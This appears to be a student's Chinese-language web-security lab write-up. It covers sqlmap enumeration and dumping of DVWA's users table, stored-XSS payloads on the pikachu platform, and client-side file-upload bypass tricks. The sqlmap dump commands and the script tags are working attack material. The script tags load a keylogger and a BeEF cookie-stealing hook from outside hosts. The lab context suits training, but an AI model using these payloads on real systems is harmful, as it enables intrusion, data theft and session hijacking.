C9第九周

任务目标

1、使用Sqlmap工具完成对DVWA数据库注入过程，要求按照库、表、列、内容的顺序进行注入
2、XSS
（1）使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie
（2）使用beef进行钓鱼，获取用户cookie
3、文件上传：
（1）客户端绕过练习
（2）服务端黑名单绕过：给出.htaccess文件绕过的具体步骤

<任务一>

使用Sqlmap工具完成对DVWA数据库注入过程，要求按照库、表、列、内容的顺序进行注入

库名-->表名-->字段名-->内容

sqlmap.py -r D:\web\software\sqlmap\1.txt --dbs --batch

sqlmap.py -r D:\web\software\sqlmap\1.txt -D dvwa --tables --batch

sqlmap.py -r D:\web\software\sqlmap\1.txt -D dvwa -T users --columns --batch

sqlmap.py -r D:\web\software\sqlmap\1.txt -D dvwa -T users -C user,password --dump --batch

<任务二>

XSS
（1）使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie
（2）使用beef进行钓鱼，获取用户cookie

任务二(1)

查看pikachu自带XSS键盘记录利用脚本 /var/www/html/pkxss/rkeypress/rk.js

在存储型XSS模块输入payload：

<script src="http://10.0.0.155:8083/pkxss/rkeypress/rk.js"></script>

前端输入：c9019_yancy666

后台看到记录成功

任务二(2)

使用beef进行钓鱼，获取用户cookie

<script src="http://10.0.0.154:3000/hook.js"></script>

<任务三>

文件上传：
（1）客户端绕过练习
（2）服务端黑名单绕过：给出.htaccess文件绕过的具体步骤

任务三(1)

客户端绕过练习

前端禁JS

改后缀名

删前端代码

服务端黑名单绕过

给出.htaccess文件绕过的具体步骤